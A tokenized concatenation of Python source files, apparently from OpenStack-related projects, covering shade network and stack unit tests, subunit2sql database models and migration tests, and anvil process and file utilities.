'<STR_LIT>' , delete = False ) <EOL> env . write ( environment % simple_tmpl . name ) <EOL> env . close ( ) <EOL> self . stack_name = self . getUniqueString ( '<STR_LIT>' ) <EOL> self . addCleanup ( self . _cleanup_stack ) <EOL> stack = self . cloud . create_stack ( name = self . stack_name , <EOL> template_file = test_template . name , <EOL> environment_files = [ env . name ] , <EOL> wait = True ) <EOL> self . 
assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> rands = stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( [ '<STR_LIT:0>' , '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' , '<STR_LIT:4>' ] , sorted ( rands . keys ( ) ) ) <EOL> for rand in rands . values ( ) : <EOL> self . assertEqual ( <NUM_LIT:10> , len ( rand ) ) </s>
<s> import mock <EOL> import testtools <EOL> import shade <EOL> from shade . tests . unit import base <EOL> class TestNetwork ( base . TestCase ) : <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network ( self , mock_neutron ) : <EOL> self . cloud . create_network ( "<STR_LIT>" ) <EOL> mock_neutron . create_network . assert_called_with ( <EOL> body = dict ( <EOL> network = dict ( <EOL> name = '<STR_LIT>' , <EOL> shared = False , <EOL> admin_state_up = True <EOL> ) <EOL> ) <EOL> ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network_specific_tenant ( self , mock_neutron ) : <EOL> self . cloud . create_network ( "<STR_LIT>" , project_id = "<STR_LIT>" ) <EOL> mock_neutron . create_network . assert_called_with ( <EOL> body = dict ( <EOL> network = dict ( <EOL> name = '<STR_LIT>' , <EOL> shared = False , <EOL> admin_state_up = True , <EOL> tenant_id = "<STR_LIT>" , <EOL> ) <EOL> ) <EOL> ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network_external ( self , mock_neutron ) : <EOL> self . cloud . create_network ( "<STR_LIT>" , external = True ) <EOL> mock_neutron . create_network . assert_called_with ( <EOL> body = dict ( <EOL> network = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True <EOL> } <EOL> ) <EOL> ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network_provider ( self , mock_neutron ) : <EOL> provider_opts = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . cloud . create_network ( "<STR_LIT>" , provider = provider_opts ) <EOL> mock_neutron . create_network . 
assert_called_once_with ( <EOL> body = dict ( <EOL> network = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> } <EOL> ) <EOL> ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network_provider_ignored_value ( self , mock_neutron ) : <EOL> provider_opts = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> } <EOL> self . cloud . create_network ( "<STR_LIT>" , provider = provider_opts ) <EOL> mock_neutron . create_network . assert_called_once_with ( <EOL> body = dict ( <EOL> network = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> } <EOL> ) <EOL> ) <EOL> def test_create_network_provider_wrong_type ( self ) : <EOL> provider_opts = "<STR_LIT>" <EOL> with testtools . ExpectedException ( <EOL> shade . OpenStackCloudException , <EOL> "<STR_LIT>" <EOL> ) : <EOL> self . cloud . create_network ( "<STR_LIT>" , provider = provider_opts ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_delete_network ( self , mock_neutron , mock_get ) : <EOL> mock_get . return_value = dict ( id = '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> self . assertTrue ( self . cloud . delete_network ( '<STR_LIT>' ) ) <EOL> mock_get . assert_called_once_with ( '<STR_LIT>' ) <EOL> mock_neutron . delete_network . assert_called_once_with ( network = '<STR_LIT>' ) <EOL> @ mock . patch . object ( shade . 
OpenStackCloud , '<STR_LIT>' ) <EOL> def test_delete_network_not_found ( self , mock_get ) : <EOL> mock_get . return_value = None <EOL> self . assertFalse ( self . cloud . delete_network ( '<STR_LIT>' ) ) <EOL> mock_get . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_delete_network_exception ( self , mock_neutron , mock_get ) : <EOL> mock_get . return_value = dict ( id = '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> mock_neutron . delete_network . side_effect = Exception ( ) <EOL> with testtools . ExpectedException ( <EOL> shade . OpenStackCloudException , <EOL> "<STR_LIT>" <EOL> ) : <EOL> self . cloud . delete_network ( '<STR_LIT>' ) <EOL> mock_get . assert_called_once_with ( '<STR_LIT>' ) <EOL> mock_neutron . delete_network . assert_called_once_with ( network = '<STR_LIT>' ) </s>
<s> import datetime <EOL> import uuid <EOL> from oslo_db . sqlalchemy import models <EOL> import six <EOL> import sqlalchemy as sa <EOL> from sqlalchemy . ext import declarative <EOL> BASE = declarative . declarative_base ( ) <EOL> class SubunitBase ( models . ModelBase ) : <EOL> """<STR_LIT>""" <EOL> __table_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> __table_initialized__ = False <EOL> def save ( self , session = None ) : <EOL> from subunit2sql . db import api as db_api <EOL> super ( SubunitBase , self ) . save ( session or db_api . get_session ( ) ) <EOL> def keys ( self ) : <EOL> return list ( self . __dict__ . keys ( ) ) <EOL> def values ( self ) : <EOL> return self . __dict__ . values ( ) <EOL> def items ( self ) : <EOL> return self . __dict__ . items ( ) <EOL> def to_dict ( self ) : <EOL> d = self . __dict__ . copy ( ) <EOL> d . pop ( "<STR_LIT>" ) <EOL> return d <EOL> class Test ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , <EOL> mysql_length = { '<STR_LIT>' : <NUM_LIT:30> } ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' , <EOL> mysql_length = <NUM_LIT:30> ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> test_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> nullable = False ) <EOL> run_count = sa . Column ( sa . Integer ( ) ) <EOL> success = sa . Column ( sa . Integer ( ) ) <EOL> failure = sa . Column ( sa . Integer ( ) ) <EOL> run_time = sa . Column ( sa . Float ( ) ) <EOL> class Run ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> uuid = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> default = lambda : six . text_type ( uuid . uuid4 ( ) ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> skips = sa . Column ( sa . Integer ( ) ) <EOL> fails = sa . Column ( sa . 
Integer ( ) ) <EOL> passes = sa . Column ( sa . Integer ( ) ) <EOL> run_time = sa . Column ( sa . Float ( ) ) <EOL> artifacts = sa . Column ( sa . Text ( ) ) <EOL> run_at = sa . Column ( sa . DateTime , <EOL> default = datetime . datetime . utcnow ) <EOL> class TestRun ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT>' , <EOL> name = '<STR_LIT>' ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> test_id = sa . Column ( sa . BigInteger ) <EOL> run_id = sa . Column ( sa . BigInteger ) <EOL> status = sa . Column ( sa . String ( <NUM_LIT> ) ) <EOL> start_time = sa . Column ( sa . DateTime ( ) ) <EOL> start_time_microsecond = sa . Column ( sa . Integer ( ) , default = <NUM_LIT:0> ) <EOL> stop_time = sa . Column ( sa . DateTime ( ) ) <EOL> stop_time_microsecond = sa . Column ( sa . Integer ( ) , default = <NUM_LIT:0> ) <EOL> test = sa . orm . relationship ( Test , backref = sa . orm . backref ( '<STR_LIT>' ) , <EOL> foreign_keys = test_id , <EOL> primaryjoin = test_id == Test . id ) <EOL> run = sa . orm . relationship ( Run , backref = sa . orm . backref ( '<STR_LIT>' ) , <EOL> foreign_keys = run_id , <EOL> primaryjoin = run_id == Run . id ) <EOL> class RunMetadata ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' , <EOL> name = '<STR_LIT>' ) ) <EOL> id = sa . Column ( sa . 
BigInteger , primary_key = True ) <EOL> key = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> value = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> run_id = sa . Column ( sa . BigInteger ) <EOL> run = sa . orm . relationship ( Run , backref = '<STR_LIT>' , foreign_keys = run_id , <EOL> primaryjoin = run_id == Run . id ) <EOL> class TestRunMetadata ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' , <EOL> name = '<STR_LIT>' ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> key = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> value = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> test_run_id = sa . Column ( sa . BigInteger ) <EOL> test_run = sa . orm . relationship ( TestRun , <EOL> backref = sa . orm . backref ( '<STR_LIT>' ) , <EOL> foreign_keys = test_run_id , <EOL> primaryjoin = test_run_id == TestRun . id ) <EOL> class TestMetadata ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' , <EOL> name = '<STR_LIT>' ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> key = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> value = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> test_id = sa . Column ( sa . BigInteger ) <EOL> test = sa . orm . relationship ( Test , backref = '<STR_LIT:test>' , foreign_keys = test_id , <EOL> primaryjoin = test_id == Test . id ) <EOL> class Attachments ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> id = sa . Column ( sa . 
BigInteger , primary_key = True ) <EOL> test_run_id = sa . Column ( sa . BigInteger ) <EOL> label = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> attachment = sa . Column ( sa . LargeBinary ( ) ) <EOL> test_run = sa . orm . relationship ( TestRun , backref = '<STR_LIT>' , <EOL> foreign_keys = test_run_id , <EOL> primaryjoin = test_run_id == TestRun . id ) </s>
<s> import mock <EOL> from oslo_db . sqlalchemy import test_migrations <EOL> import sqlalchemy <EOL> import testscenarios <EOL> from subunit2sql . db import models <EOL> from subunit2sql . tests import base <EOL> from subunit2sql . tests import db_test_utils <EOL> from subunit2sql . tests import subunit2sql_fixtures as fixtures <EOL> load_tests = testscenarios . load_tests_apply_scenarios <EOL> class TestModelsMigrations ( test_migrations . ModelsMigrationsSync , <EOL> base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> scenarios = [ <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ] <EOL> db = mock . MagicMock ( ) <EOL> def setUp ( self ) : <EOL> super ( TestModelsMigrations , self ) . setUp ( ) <EOL> self . useFixture ( fixtures . LockFixture ( self . dialect ) ) <EOL> if not db_test_utils . is_backend_avail ( self . dialect ) : <EOL> raise self . skipTest ( '<STR_LIT>' % self . dialect ) <EOL> if self . dialect == '<STR_LIT>' : <EOL> raise self . skipException ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . dialect == '<STR_LIT>' : <EOL> self . useFixture ( fixtures . MySQLConfFixture ( ) ) <EOL> elif self . dialect == '<STR_LIT>' : <EOL> self . useFixture ( fixtures . PostgresConfFixture ( ) ) <EOL> connect_string = db_test_utils . get_connect_string ( self . dialect ) <EOL> self . engine = sqlalchemy . create_engine ( connect_string ) <EOL> def get_engine ( self ) : <EOL> return self . engine <EOL> def get_metadata ( self ) : <EOL> return models . BASE . metadata <EOL> def db_sync ( self , engine ) : <EOL> db_test_utils . run_migration ( '<STR_LIT>' , engine ) <EOL> def include_object ( self , object_ , name , type_ , reflected , compare_to ) : <EOL> if type_ == '<STR_LIT>' and name == '<STR_LIT>' : <EOL> return False <EOL> return super ( TestModelsMigrations , self ) . 
include_object ( <EOL> object_ , name , type_ , reflected , compare_to ) <EOL> def filter_metadata_diff ( self , diff ) : <EOL> return filter ( self . remove_unrelated_errors , diff ) <EOL> def remove_unrelated_errors ( self , element ) : <EOL> insp = sqlalchemy . engine . reflection . Inspector . from_engine ( <EOL> self . get_engine ( ) ) <EOL> dialect = self . get_engine ( ) . dialect . name <EOL> if isinstance ( element , tuple ) : <EOL> if dialect == '<STR_LIT>' and element [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> table_name = element [ <NUM_LIT:1> ] . table . name <EOL> for fk in insp . get_foreign_keys ( table_name ) : <EOL> if fk [ '<STR_LIT:name>' ] == element [ <NUM_LIT:1> ] . name : <EOL> return False <EOL> cols = [ c . name for c in element [ <NUM_LIT:1> ] . expressions ] <EOL> for col in cols : <EOL> if col in insp . get_pk_constraint ( <EOL> table_name ) [ '<STR_LIT>' ] : <EOL> return False <EOL> else : <EOL> for modified , _ , table , column , _ , _ , new in element : <EOL> if modified == '<STR_LIT>' and dialect == '<STR_LIT>' : <EOL> constrained = insp . get_pk_constraint ( table ) <EOL> if column in constrained [ '<STR_LIT>' ] : <EOL> return False <EOL> return True </s>
<s> import os <EOL> import re <EOL> from sqlalchemy import create_engine <EOL> from sqlalchemy import event <EOL> def get_url ( ) : <EOL> """<STR_LIT>""" <EOL> db_file_path = os . path . expanduser ( '<STR_LIT>' ) <EOL> return "<STR_LIT>" % db_file_path <EOL> def _re_fn ( expr , item ) : <EOL> "<STR_LIT>" <EOL> reg = re . compile ( expr , re . I ) <EOL> return reg . search ( item ) is not None <EOL> def connect ( ) : <EOL> """<STR_LIT>""" <EOL> engine = create_engine ( get_url ( ) ) <EOL> @ event . listens_for ( engine , "<STR_LIT>" ) <EOL> def do_begin ( conn ) : <EOL> conn . connection . create_function ( '<STR_LIT>' , <NUM_LIT:2> , _re_fn ) <EOL> return engine </s>
<s> import sys <EOL> import threading <EOL> from concurrent import futures <EOL> import six <EOL> from six . moves import queue as compat_queue <EOL> from six . moves import range as compat_range <EOL> from anvil import log as logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> _TOMBSTONE = object ( ) <EOL> def _chained_worker ( ident , shared_death , queue , futs ) : <EOL> running = True <EOL> while running : <EOL> if shared_death . is_set ( ) : <EOL> LOG . warn ( "<STR_LIT>" , ident ) <EOL> running = False <EOL> else : <EOL> w = queue . get ( ) <EOL> if w is _TOMBSTONE : <EOL> queue . put ( w ) <EOL> LOG . info ( "<STR_LIT>" , ident ) <EOL> running = False <EOL> else : <EOL> func , fut = w <EOL> if fut . set_running_or_notify_cancel ( ) : <EOL> try : <EOL> result = func ( ) <EOL> except BaseException : <EOL> LOG . exception ( "<STR_LIT>" , ident ) <EOL> exc_type , exc_val , exc_tb = sys . exc_info ( ) <EOL> if six . PY2 : <EOL> fut . set_exception_info ( exc_val , exc_tb ) <EOL> else : <EOL> fut . set_exception ( exc_val ) <EOL> shared_death . set ( ) <EOL> for fut in futs : <EOL> fut . cancel ( ) <EOL> running = False <EOL> else : <EOL> fut . set_result ( result ) <EOL> class ChainedWorkerExecutor ( object ) : <EOL> def __init__ ( self , max_workers ) : <EOL> self . _workers = [ ] <EOL> self . _max_workers = int ( max_workers ) <EOL> self . _queue = compat_queue . Queue ( ) <EOL> self . _death = threading . Event ( ) <EOL> def run ( self , funcs ) : <EOL> if self . _workers : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( len ( self . _workers ) ) ) <EOL> self . _queue = compat_queue . Queue ( ) <EOL> self . _death . clear ( ) <EOL> futs = [ ] <EOL> for i in compat_range ( <NUM_LIT:0> , self . _max_workers ) : <EOL> w = threading . Thread ( target = _chained_worker , <EOL> args = ( i + <NUM_LIT:1> , self . _death , <EOL> self . _queue , futs ) ) <EOL> w . daemon = True <EOL> w . start ( ) <EOL> self . _workers . 
append ( w ) <EOL> for func in funcs : <EOL> fut = futures . Future ( ) <EOL> futs . append ( fut ) <EOL> self . _queue . put ( ( func , fut ) ) <EOL> return futs <EOL> def wait ( self ) : <EOL> self . _queue . put ( _TOMBSTONE ) <EOL> while self . _workers : <EOL> w = self . _workers . pop ( ) <EOL> w . join ( ) </s>
<s> import collections <EOL> import contextlib <EOL> import getpass <EOL> import grp <EOL> import gzip as gz <EOL> import os <EOL> import pwd <EOL> import shutil <EOL> import signal <EOL> import socket <EOL> import subprocess <EOL> import time <EOL> import distutils . spawn <EOL> import psutil <EOL> import anvil <EOL> from anvil import env <EOL> from anvil import exceptions as excp <EOL> from anvil import log as logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> SUDO_UID = env . get_key ( '<STR_LIT>' ) <EOL> SUDO_GID = env . get_key ( '<STR_LIT>' ) <EOL> _TRUNCATED_OUTPUT_LINES = <NUM_LIT:7> <EOL> getsize = os . path . getsize <EOL> exists = os . path . exists <EOL> basename = os . path . basename <EOL> dirname = os . path . dirname <EOL> canon_path = os . path . realpath <EOL> prompt = raw_input <EOL> isfile = os . path . isfile <EOL> isdir = os . path . isdir <EOL> islink = os . path . islink <EOL> geteuid = os . geteuid <EOL> getegid = os . getegid <EOL> class Process ( psutil . Process ) : <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . pid , self . name ) <EOL> def execute ( cmd , <EOL> process_input = None , <EOL> check_exit_code = True , <EOL> cwd = None , <EOL> shell = False , <EOL> env_overrides = None , <EOL> stdout_fh = subprocess . PIPE , <EOL> stderr_fh = subprocess . PIPE ) : <EOL> """<STR_LIT>""" <EOL> cmd = map ( str , cmd ) <EOL> str_cmd = subprocess . list2cmdline ( cmd ) <EOL> if shell : <EOL> cmd = str_cmd <EOL> LOG . debug ( '<STR_LIT>' % cmd ) <EOL> else : <EOL> LOG . debug ( '<STR_LIT>' % cmd ) <EOL> if process_input is not None : <EOL> process_input = str ( process_input ) <EOL> LOG . debug ( '<STR_LIT>' % process_input ) <EOL> if cwd : <EOL> LOG . debug ( '<STR_LIT>' % cwd ) <EOL> process_env = None <EOL> if env_overrides and len ( env_overrides ) : <EOL> process_env = env . get ( ) <EOL> for k , v in env_overrides . items ( ) : <EOL> LOG . 
debug ( "<STR_LIT>" , k , v ) <EOL> process_env [ k ] = str ( v ) <EOL> exec_kwargs = { <EOL> '<STR_LIT>' : subprocess . PIPE , <EOL> '<STR_LIT>' : stdout_fh , <EOL> '<STR_LIT>' : stderr_fh , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : shell , <EOL> '<STR_LIT>' : cwd , <EOL> '<STR_LIT>' : process_env , <EOL> } <EOL> result = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> try : <EOL> obj = subprocess . Popen ( cmd , ** exec_kwargs ) <EOL> result = obj . communicate ( process_input ) <EOL> except OSError as e : <EOL> raise excp . ProcessExecutionError ( <EOL> str_cmd , <EOL> exec_kwargs = exec_kwargs , <EOL> description = "<STR_LIT>" % ( e , e . errno , e . strerror ) <EOL> ) <EOL> else : <EOL> rc = obj . returncode <EOL> stdout = result [ <NUM_LIT:0> ] or "<STR_LIT>" <EOL> stderr = result [ <NUM_LIT:1> ] or "<STR_LIT>" <EOL> if rc != <NUM_LIT:0> and check_exit_code : <EOL> e = excp . ProcessExecutionError ( str_cmd , <EOL> exec_kwargs = exec_kwargs , <EOL> stdout = stdout , <EOL> stderr = stderr , <EOL> exit_code = rc , <EOL> where_output = "<STR_LIT>" ) <EOL> LOG . debug ( "<STR_LIT>" , e . stdout ) <EOL> LOG . debug ( "<STR_LIT>" , e . stderr ) <EOL> raise e <EOL> return stdout , stderr <EOL> def execute_save_output ( cmd , file_name , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs = kwargs . copy ( ) <EOL> mkdirslist ( dirname ( file_name ) ) <EOL> try : <EOL> with open ( file_name , '<STR_LIT:wb>' ) as fh : <EOL> return execute ( cmd , stdout_fh = fh , stderr_fh = fh , ** kwargs ) <EOL> except excp . ProcessExecutionError : <EOL> with excp . reraise ( ) : <EOL> try : <EOL> with open ( file_name , '<STR_LIT:rb>' ) as fh : <EOL> lines = collections . deque ( fh , <EOL> maxlen = _TRUNCATED_OUTPUT_LINES ) <EOL> content = "<STR_LIT>" . join ( lines ) <EOL> except IOError : <EOL> pass <EOL> else : <EOL> LOG . debug ( '<STR_LIT>' , file_name , content ) <EOL> @ contextlib . 
contextmanager <EOL> def remove_before ( path ) : <EOL> if isdir ( path ) : <EOL> deldir ( path ) <EOL> if isfile ( path ) : <EOL> unlink ( path ) <EOL> yield path <EOL> def gzip ( file_name , gz_archive_name = None ) : <EOL> if not isfile ( file_name ) : <EOL> raise IOError ( "<STR_LIT>" % ( file_name ) ) <EOL> if not gz_archive_name : <EOL> gz_archive_name = "<STR_LIT>" % ( file_name ) <EOL> with contextlib . closing ( gz . open ( gz_archive_name , '<STR_LIT:wb>' ) ) as tz : <EOL> with open ( file_name , '<STR_LIT:rb>' ) as fh : <EOL> tz . write ( fh . read ( ) ) <EOL> return gz_archive_name <EOL> def abspth ( path ) : <EOL> if not path : <EOL> path = "<STR_LIT:/>" <EOL> if path == "<STR_LIT>" : <EOL> path = gethomedir ( ) <EOL> return os . path . abspath ( path ) <EOL> def hostname ( default = '<STR_LIT:localhost>' ) : <EOL> try : <EOL> return socket . gethostname ( ) <EOL> except socket . error : <EOL> return default <EOL> def pipe_in_out ( in_fh , out_fh , chunk_size = <NUM_LIT> , chunk_cb = None ) : <EOL> bytes_piped = <NUM_LIT:0> <EOL> LOG . debug ( "<STR_LIT>" , in_fh , out_fh , chunk_size ) <EOL> while True : <EOL> data = in_fh . read ( chunk_size ) <EOL> if data == '<STR_LIT>' : <EOL> break <EOL> else : <EOL> out_fh . write ( data ) <EOL> bytes_piped += len ( data ) <EOL> if chunk_cb : <EOL> chunk_cb ( bytes_piped ) <EOL> return bytes_piped <EOL> def fileperms ( path ) : <EOL> return ( os . stat ( path ) . st_mode & <NUM_LIT> ) <EOL> def listdir ( path , recursive = False , dirs_only = False , files_only = False , filter_func = None ) : <EOL> path = abspth ( path ) <EOL> all_contents = [ ] <EOL> if not recursive : <EOL> all_contents = os . listdir ( path ) <EOL> all_contents = [ joinpths ( path , f ) for f in all_contents ] <EOL> else : <EOL> for ( root , dirs , files ) in os . walk ( path ) : <EOL> for d in dirs : <EOL> all_contents . append ( joinpths ( root , d ) ) <EOL> for f in files : <EOL> all_contents . 
append ( joinpths ( root , f ) ) <EOL> if dirs_only : <EOL> all_contents = [ f for f in all_contents if isdir ( f ) ] <EOL> if files_only : <EOL> all_contents = [ f for f in all_contents if isfile ( f ) ] <EOL> if filter_func : <EOL> all_contents = [ f for f in all_contents if filter_func ( f ) ] <EOL> return all_contents <EOL> def joinpths ( * paths ) : <EOL> return os . path . join ( * paths ) <EOL> def get_suids ( ) : <EOL> uid = SUDO_UID <EOL> if uid is not None : <EOL> uid = int ( uid ) <EOL> gid = SUDO_GID <EOL> if gid is not None : <EOL> gid = int ( gid ) <EOL> return ( uid , gid ) <EOL> def chown ( path , uid , gid ) : <EOL> if uid is None : <EOL> uid = - <NUM_LIT:1> <EOL> if gid is None : <EOL> gid = - <NUM_LIT:1> <EOL> if uid == - <NUM_LIT:1> and gid == - <NUM_LIT:1> : <EOL> return <NUM_LIT:0> <EOL> LOG . debug ( "<STR_LIT>" % ( path , uid , gid ) ) <EOL> os . chown ( path , uid , gid ) <EOL> return <NUM_LIT:1> <EOL> def chown_r ( path , uid , gid ) : <EOL> changed = <NUM_LIT:0> <EOL> for ( root , dirs , files ) in os . walk ( path ) : <EOL> changed += chown ( root , uid , gid ) <EOL> for d in dirs : <EOL> dir_pth = joinpths ( root , d ) <EOL> changed += chown ( dir_pth , uid , gid ) <EOL> for f in files : <EOL> fn_pth = joinpths ( root , f ) <EOL> changed += chown ( fn_pth , uid , gid ) <EOL> return changed <EOL> def _explode_path ( path ) : <EOL> dirs = [ ] <EOL> comps = [ ] <EOL> path = abspth ( path ) <EOL> dirs . append ( path ) <EOL> ( head , tail ) = os . path . split ( path ) <EOL> while tail : <EOL> dirs . append ( head ) <EOL> comps . append ( tail ) <EOL> path = head <EOL> ( head , tail ) = os . path . split ( path ) <EOL> dirs . sort ( ) <EOL> comps . reverse ( ) <EOL> return ( dirs , comps ) <EOL> def explode_path ( path ) : <EOL> return _explode_path ( path ) [ <NUM_LIT:0> ] <EOL> def _attempt_kill ( proc , signal_type , max_try , wait_time ) : <EOL> try : <EOL> if not proc . 
is_running ( ) : <EOL> return ( True , <NUM_LIT:0> ) <EOL> except psutil . error . NoSuchProcess : <EOL> return ( True , <NUM_LIT:0> ) <EOL> killed = False <EOL> attempts = <NUM_LIT:0> <EOL> for _i in range ( <NUM_LIT:0> , max_try ) : <EOL> try : <EOL> LOG . debug ( "<STR_LIT>" % ( proc ) ) <EOL> attempts += <NUM_LIT:1> <EOL> proc . send_signal ( signal_type ) <EOL> LOG . debug ( "<STR_LIT>" % ( wait_time , proc ) ) <EOL> sleep ( wait_time ) <EOL> except psutil . error . NoSuchProcess : <EOL> killed = True <EOL> break <EOL> except Exception as e : <EOL> LOG . debug ( "<STR_LIT>" , proc , e ) <EOL> LOG . debug ( "<STR_LIT>" % ( wait_time , proc ) ) <EOL> sleep ( wait_time ) <EOL> return ( killed , attempts ) <EOL> def kill ( pid , max_try = <NUM_LIT:4> , wait_time = <NUM_LIT:1> ) : <EOL> if not is_running ( pid ) : <EOL> return ( True , <NUM_LIT:0> ) <EOL> proc = Process ( pid ) <EOL> ( killed , i_attempts ) = _attempt_kill ( proc , signal . SIGINT , <EOL> int ( max_try / <NUM_LIT:2> ) , wait_time ) <EOL> if killed : <EOL> return ( True , i_attempts ) <EOL> ( killed , k_attempts ) = _attempt_kill ( proc , signal . SIGKILL , <EOL> int ( max_try / <NUM_LIT:2> ) , wait_time ) <EOL> return ( killed , i_attempts + k_attempts ) <EOL> def is_running ( pid ) : <EOL> try : <EOL> return Process ( pid ) . is_running ( ) <EOL> except psutil . error . NoSuchProcess : <EOL> return False <EOL> def mkdirslist ( path , tracewriter = None ) : <EOL> dirs_possible = explode_path ( path ) <EOL> dirs_made = [ ] <EOL> for dir_path in dirs_possible : <EOL> if not isdir ( dir_path ) : <EOL> mkdir ( dir_path , recurse = False ) <EOL> if tracewriter : <EOL> tracewriter . dirs_made ( dir_path ) <EOL> dirs_made . append ( dir_path ) <EOL> return dirs_made <EOL> def append_file ( fn , text , flush = True , quiet = False ) : <EOL> if not quiet : <EOL> LOG . debug ( "<STR_LIT>" , fn , len ( text ) , ( flush ) 